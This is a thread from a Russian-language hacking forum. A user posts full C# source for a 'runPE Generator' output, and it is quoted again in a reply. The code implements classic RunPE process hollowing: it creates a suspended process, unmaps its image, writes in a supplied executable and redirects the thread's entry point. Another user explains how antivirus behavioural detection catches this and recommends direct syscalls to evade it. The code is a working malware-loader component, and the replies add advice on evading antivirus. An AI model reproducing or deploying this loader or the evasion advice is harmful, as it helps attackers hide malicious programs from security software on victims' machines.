• XSS.stack #1 – первый литературный журнал от юзеров форума

runPE Generator

Отслеживать
mectury

mectury

RAM
Пользователь
Регистрация
06.06.2021
Сообщения
118
Реакции
58
Example Output Code ;

C#: 
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace ToGlanch
{
    public static class TaterTotsPots
    {
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "CreateProcess", CharSet = System.Runtime.InteropServices.CharSet.Unicode)]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool CreateProcess_API(string applicationName, string commandLine, System.IntPtr processAttributes, System.IntPtr threadAttributes, bool inheritHandles, uint creationFlags, System.IntPtr environment, string currentDirectory, ref ToasterOven startupInfo, ref CayennePepper processInformation);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "GetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool GetThreadContext_API(System.IntPtr thread, int[] context);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "Wow64GetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool Wow64GetThreadContext_API(System.IntPtr thread, int[] context);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "SetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool SetThreadContext_API(System.IntPtr thread, int[] context);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "Wow64SetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool Wow64SetThreadContext_API(System.IntPtr thread, int[] context);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool ReadProcessMemory_API(System.IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "WriteProcessMemory")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool WriteProcessMemory_API(System.IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
        [System.Runtime.InteropServices.DllImport("ntdll.dll", EntryPoint = "UnmapViewOfSection")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern int NtUnmapViewOfSection_API(System.IntPtr process, int baseAddress);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern int VirtualAllocEx_API(System.IntPtr handle, int address, int length, int type, int protect);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "ResumeThread")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern int ResumeThread_API(System.IntPtr handle);
        [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack = 1)]
        
        private struct CayennePepper
        {
            public System.IntPtr HasanHandle;
            public System.IntPtr TihradHandle;
            public uint _processıd;
            public uint _threadıd;
        } // CayennePepper

        [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack = 1)]
        private struct ToasterOven
        {
            public uint Size_;
            public string _reversed1s_;
            public string _desktop_;
            public string _title_;

            public int dwX;
            public int dwY;
            public int dwXSize;
            public int dwYSize;
            public int dwXCountChars;
            public int dwYCountChars;
            public int dwFillAttribute;
            public int FLAGSS;
            public short wShowWindow;
            public short cbReserved2;
            public System.IntPtr Reserved2;
            public System.IntPtr StdInput;
            public System.IntPtr StdOutput;
            public System.IntPtr StdError;
        }

        public static bool CharketerBeer(string SpouseBalkans, string GreaseYay, byte[] AllspiceRate, bool GingerbreadHouse)
        {
            for (int fri = 1; fri <= 5; fri++)
            {
                if (EggBeaterDeader(SpouseBalkans, GreaseYay, AllspiceRate, GingerbreadHouse))
                    return true;
            }

            return false;
        } // Run
        private static bool EggBeaterDeader(string ChowerGeneral, string ClamChowder, byte[] Inleavened, bool MixingBowl)
        {
            int ReadWrite = 0;
            string QuotedPath = string.Format("\"{0}\"", ChowerGeneral);

            ToasterOven SI = new ToasterOven();
            CayennePepper PI = new CayennePepper();

            SI.FLAGSS = 0;
            SI.Size_ = System.Convert.ToUInt32(System.Runtime.InteropServices.Marshal.SizeOf(typeof(ToasterOven)));

            try
            {
                if (!string.IsNullOrEmpty(ClamChowder))
                    QuotedPath = QuotedPath + " " + ClamChowder;

                if (!CreateProcess_API(ChowerGeneral, QuotedPath, System.IntPtr.Zero, System.IntPtr.Zero, false, 4, System.IntPtr.Zero, null, ref SI, ref PI))
                    throw new System.Exception();

                int FileAddress = System.BitConverter.ToInt32(Inleavened, 60);
                int ImageBase = System.BitConverter.ToInt32(Inleavened, FileAddress + 52);

                int[] Context_ = new int[179];
                Context_[0] = 65538;

                if (System.IntPtr.Size == 4)
                {
                    if (!GetThreadContext_API(PI.TihradHandle, Context_))
                        throw new System.Exception();
                }
                else if (!Wow64GetThreadContext_API(PI.TihradHandle, Context_))   
                    throw new System.Exception();

                int Ebx = Context_[41];
                int BaseAddress = 0;

                if (!ReadProcessMemory_API(PI.HasanHandle, Ebx + 8, ref BaseAddress, 4, ref ReadWrite))
                    throw new System.Exception();

                if (ImageBase == BaseAddress) 
                {
                    if (!(NtUnmapViewOfSection_API(PI.HasanHandle, BaseAddress) == 0))
                        throw new System.Exception();
                }

                int SizeOfImage = System.BitConverter.ToInt32(Inleavened, FileAddress + 80);
                int SizeOfHeaders = System.BitConverter.ToInt32(Inleavened, FileAddress + 84);

                bool AllowOverride = false;
                int NewImageBase = VirtualAllocEx_API(PI.HasanHandle, ImageBase, SizeOfImage, 12288, 64); // R1 

        

                if (!MixingBowl && NewImageBase == 0)
                {
                    AllowOverride = true;
                    NewImageBase = VirtualAllocEx_API(PI.HasanHandle, 0, SizeOfImage, 12288, 64);
                }

                if (NewImageBase == 0)
                    throw new System.Exception();


                if (!WriteProcessMemory_API(PI.HasanHandle, NewImageBase, Inleavened, SizeOfHeaders, ref ReadWrite))
                    throw new System.Exception();

                int SectionOffset = FileAddress + 248;
                short NumberOfSections = System.BitConverter.ToInt16(Inleavened, FileAddress + 6);

                for (int fri = 0; fri <= NumberOfSections - 1; fri++)
                {
                    int VirtualAddress = System.BitConverter.ToInt32(Inleavened, SectionOffset + 12);
                    int SizeOfRawData = System.BitConverter.ToInt32(Inleavened, SectionOffset + 16);
                    int PointerToRawData = System.BitConverter.ToInt32(Inleavened, SectionOffset + 20);

                    if (!(SizeOfRawData == 0))
                    {
                        byte[] SectionData = new byte[SizeOfRawData - 1 + 1];
                        System.Buffer.BlockCopy(Inleavened, PointerToRawData, SectionData, 0, SectionData.Length);

                        if (!WriteProcessMemory_API(PI.HasanHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ref ReadWrite))
                            throw new System.Exception();
                    }

                    SectionOffset += 40;
                }

                byte[] PointerData = System.BitConverter.GetBytes(NewImageBase);
                if (!WriteProcessMemory_API(PI.HasanHandle, Ebx + 8, PointerData, 4, ref ReadWrite))
                    throw new System.Exception();

                int AddressOfEntryPoint = System.BitConverter.ToInt32(Inleavened, FileAddress + 40);

                if (AllowOverride)
                    NewImageBase = ImageBase;
                Context_[44] = NewImageBase + AddressOfEntryPoint;

                if (System.IntPtr.Size == 4)
                {
                    if (!SetThreadContext_API(PI.TihradHandle, Context_))
                        throw new System.Exception();
                }
                else if (!Wow64SetThreadContext_API(PI.TihradHandle, Context_))
                    throw new System.Exception();

                if (ResumeThread_API(PI.TihradHandle) == -1)
                    throw new System.Exception();
            }
            catch
            {
                System.Diagnostics.Process Pros = System.Diagnostics.Process.GetProcessById(System.Convert.ToInt32(PI._processıd));
                if (Pros != null)
                    Pros.Kill();

                return false;
            }

            return true;
        }
    }

}


I wrote the "runPE Generator" Project in February of 2022, I can get an offer to revive this project again.

I will send screenshots and runtime scans in the future to inform the readers more.

Stay tuned for now... :)
 
mectury сказал(а):
Example Output Code ;

C#: 
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace ToGlanch
{
    public static class TaterTotsPots
    {
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "CreateProcess", CharSet = System.Runtime.InteropServices.CharSet.Unicode)]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool CreateProcess_API(string applicationName, string commandLine, System.IntPtr processAttributes, System.IntPtr threadAttributes, bool inheritHandles, uint creationFlags, System.IntPtr environment, string currentDirectory, ref ToasterOven startupInfo, ref CayennePepper processInformation);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "GetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool GetThreadContext_API(System.IntPtr thread, int[] context);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "Wow64GetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool Wow64GetThreadContext_API(System.IntPtr thread, int[] context);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "SetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool SetThreadContext_API(System.IntPtr thread, int[] context);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "Wow64SetThreadContext")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool Wow64SetThreadContext_API(System.IntPtr thread, int[] context);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "ReadProcessMemory")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool ReadProcessMemory_API(System.IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "WriteProcessMemory")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern bool WriteProcessMemory_API(System.IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
        [System.Runtime.InteropServices.DllImport("ntdll.dll", EntryPoint = "UnmapViewOfSection")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern int NtUnmapViewOfSection_API(System.IntPtr process, int baseAddress);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "VirtualAllocEx")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern int VirtualAllocEx_API(System.IntPtr handle, int address, int length, int type, int protect);
        [System.Runtime.InteropServices.DllImport("kernel32.dll", EntryPoint = "ResumeThread")]
        [System.Security.SuppressUnmanagedCodeSecurity]
        private static extern int ResumeThread_API(System.IntPtr handle);
        [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack = 1)]
       
        private struct CayennePepper
        {
            public System.IntPtr HasanHandle;
            public System.IntPtr TihradHandle;
            public uint _processıd;
            public uint _threadıd;
        } // CayennePepper

        [System.Runtime.InteropServices.StructLayout(System.Runtime.InteropServices.LayoutKind.Sequential, Pack = 1)]
        private struct ToasterOven
        {
            public uint Size_;
            public string _reversed1s_;
            public string _desktop_;
            public string _title_;

            public int dwX;
            public int dwY;
            public int dwXSize;
            public int dwYSize;
            public int dwXCountChars;
            public int dwYCountChars;
            public int dwFillAttribute;
            public int FLAGSS;
            public short wShowWindow;
            public short cbReserved2;
            public System.IntPtr Reserved2;
            public System.IntPtr StdInput;
            public System.IntPtr StdOutput;
            public System.IntPtr StdError;
        }

        public static bool CharketerBeer(string SpouseBalkans, string GreaseYay, byte[] AllspiceRate, bool GingerbreadHouse)
        {
            for (int fri = 1; fri <= 5; fri++)
            {
                if (EggBeaterDeader(SpouseBalkans, GreaseYay, AllspiceRate, GingerbreadHouse))
                    return true;
            }

            return false;
        } // Run
        private static bool EggBeaterDeader(string ChowerGeneral, string ClamChowder, byte[] Inleavened, bool MixingBowl)
        {
            int ReadWrite = 0;
            string QuotedPath = string.Format("\"{0}\"", ChowerGeneral);

            ToasterOven SI = new ToasterOven();
            CayennePepper PI = new CayennePepper();

            SI.FLAGSS = 0;
            SI.Size_ = System.Convert.ToUInt32(System.Runtime.InteropServices.Marshal.SizeOf(typeof(ToasterOven)));

            try
            {
                if (!string.IsNullOrEmpty(ClamChowder))
                    QuotedPath = QuotedPath + " " + ClamChowder;

                if (!CreateProcess_API(ChowerGeneral, QuotedPath, System.IntPtr.Zero, System.IntPtr.Zero, false, 4, System.IntPtr.Zero, null, ref SI, ref PI))
                    throw new System.Exception();

                int FileAddress = System.BitConverter.ToInt32(Inleavened, 60);
                int ImageBase = System.BitConverter.ToInt32(Inleavened, FileAddress + 52);

                int[] Context_ = new int[179];
                Context_[0] = 65538;

                if (System.IntPtr.Size == 4)
                {
                    if (!GetThreadContext_API(PI.TihradHandle, Context_))
                        throw new System.Exception();
                }
                else if (!Wow64GetThreadContext_API(PI.TihradHandle, Context_))  
                    throw new System.Exception();

                int Ebx = Context_[41];
                int BaseAddress = 0;

                if (!ReadProcessMemory_API(PI.HasanHandle, Ebx + 8, ref BaseAddress, 4, ref ReadWrite))
                    throw new System.Exception();

                if (ImageBase == BaseAddress)
                {
                    if (!(NtUnmapViewOfSection_API(PI.HasanHandle, BaseAddress) == 0))
                        throw new System.Exception();
                }

                int SizeOfImage = System.BitConverter.ToInt32(Inleavened, FileAddress + 80);
                int SizeOfHeaders = System.BitConverter.ToInt32(Inleavened, FileAddress + 84);

                bool AllowOverride = false;
                int NewImageBase = VirtualAllocEx_API(PI.HasanHandle, ImageBase, SizeOfImage, 12288, 64); // R1

       

                if (!MixingBowl && NewImageBase == 0)
                {
                    AllowOverride = true;
                    NewImageBase = VirtualAllocEx_API(PI.HasanHandle, 0, SizeOfImage, 12288, 64);
                }

                if (NewImageBase == 0)
                    throw new System.Exception();


                if (!WriteProcessMemory_API(PI.HasanHandle, NewImageBase, Inleavened, SizeOfHeaders, ref ReadWrite))
                    throw new System.Exception();

                int SectionOffset = FileAddress + 248;
                short NumberOfSections = System.BitConverter.ToInt16(Inleavened, FileAddress + 6);

                for (int fri = 0; fri <= NumberOfSections - 1; fri++)
                {
                    int VirtualAddress = System.BitConverter.ToInt32(Inleavened, SectionOffset + 12);
                    int SizeOfRawData = System.BitConverter.ToInt32(Inleavened, SectionOffset + 16);
                    int PointerToRawData = System.BitConverter.ToInt32(Inleavened, SectionOffset + 20);

                    if (!(SizeOfRawData == 0))
                    {
                        byte[] SectionData = new byte[SizeOfRawData - 1 + 1];
                        System.Buffer.BlockCopy(Inleavened, PointerToRawData, SectionData, 0, SectionData.Length);

                        if (!WriteProcessMemory_API(PI.HasanHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ref ReadWrite))
                            throw new System.Exception();
                    }

                    SectionOffset += 40;
                }

                byte[] PointerData = System.BitConverter.GetBytes(NewImageBase);
                if (!WriteProcessMemory_API(PI.HasanHandle, Ebx + 8, PointerData, 4, ref ReadWrite))
                    throw new System.Exception();

                int AddressOfEntryPoint = System.BitConverter.ToInt32(Inleavened, FileAddress + 40);

                if (AllowOverride)
                    NewImageBase = ImageBase;
                Context_[44] = NewImageBase + AddressOfEntryPoint;

                if (System.IntPtr.Size == 4)
                {
                    if (!SetThreadContext_API(PI.TihradHandle, Context_))
                        throw new System.Exception();
                }
                else if (!Wow64SetThreadContext_API(PI.TihradHandle, Context_))
                    throw new System.Exception();

                if (ResumeThread_API(PI.TihradHandle) == -1)
                    throw new System.Exception();
            }
            catch
            {
                System.Diagnostics.Process Pros = System.Diagnostics.Process.GetProcessById(System.Convert.ToInt32(PI._processıd));
                if (Pros != null)
                    Pros.Kill();

                return false;
            }

            return true;
        }
    }

}


I wrote the "runPE Generator" Project in February of 2022, I can get an offer to revive this project again.

I will send screenshots and runtime scans in the future to inform the readers more.

Stay tuned for now... :)
RunPE in its classical form is complete bullshit now. I'll explain why. Even if you confuse the code at the source level, generate it unique, you will only get rid of the signature detection, you still have key calls to api functions such as CreateProcess, GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext and ResumeThread. These functions are intercepted and a call map is made, tracking both call order and call parameters, which triggers heuristics and behavioral analysis.

RunPE в классическом его представлении является полной херней сейчас. Обьясню почему. Даже если ты запутал код на уровне исходников, сгенерировал его уникальным, ты избавишься только от сигнатурного детекта, у тебя остаются ключевые вызовы апи функций, такие как CreateProcess, GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext и ResumeThread. Эти функции перехватываются и составляется карта вызовов с отслеживанием как порядка вызовов так и параметров вызовов, которая триггерит эвристику и поведенческий анализ.
 
arsarsov сказал(а):
RunPE in its classical form is complete bullshit now. I'll explain why. Even if you confuse the code at the source level, generate it unique, you will only get rid of the signature detection, you still have key calls to api functions such as CreateProcess, GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext and ResumeThread. These functions are intercepted and a call map is made, tracking both call order and call parameters, which triggers heuristics and behavioral analysis.

RunPE в классическом его представлении является полной херней сейчас. Обьясню почему. Даже если ты запутал код на уровне исходников, сгенерировал его уникальным, ты избавишься только от сигнатурного детекта, у тебя остаются ключевые вызовы апи функций, такие как CreateProcess, GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext и ResumeThread. Эти функции перехватываются и составляется карта вызовов с отслеживанием как порядка вызовов так и параметров вызовов, которая триггерит эвристику и поведенческий анализ.
It's ridiculous to try to undermine an old project I did before I took the exam, apparently you didn't read the thread. I will revive this project in the future and I wonder what the new curious kids will talk about this time =))
 
mectury сказал(а):
It's ridiculous to try to undermine an old project I did before I took the exam, apparently you didn't read the thread. I will revive this project in the future and I wonder what the new curious kids will talk about this time =))
Dude, you are strange, I give you advice, and you are aggro, it would be better if you didn’t show off, but took it into account, otherwise you look like a notorious teenager. Why post classic RunPE code that is 15 years old, no less. All calls are intercepted, by some AVs even in the kernel, so in order for the old RunPE to sparkle with new colors, you need to call all Nt functions from your own code using syscall, then and only then it will work, otherwise you will get a behavioral detection in runtime. The fact that this is an old project is no excuse, the method is already over 15 years old.
 
arsarsov сказал(а):
Dude, you are strange, I give you advice, and you are aggro, it would be better if you didn’t show off, but took it into account, otherwise you look like a notorious teenager. Why post classic RunPE code that is 15 years old, no less. All calls are intercepted, by some AVs even in the kernel, so in order for the old RunPE to sparkle with new colors, you need to call all Nt functions from your own code using syscall, then and only then it will work, otherwise you will get a behavioral detection in runtime. The fact that this is an old project is no excuse, the method is already over 15 years old.
I wrote it ironically, I think I will prove myself with a new method. I don't have much time because of the work I'm busy with. I'm sure I will come in 1-2 months. by the way thank you for letting me know notoriety is for fools
 
mectury сказал(а):
I wrote it ironically, I think I will prove myself with a new method. I don't have much time because of the work I'm busy with. I'm sure I will come in 1-2 months. by the way thank you for letting me know notoriety is for fools
This method will be good if it is not implemented in the classical form
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх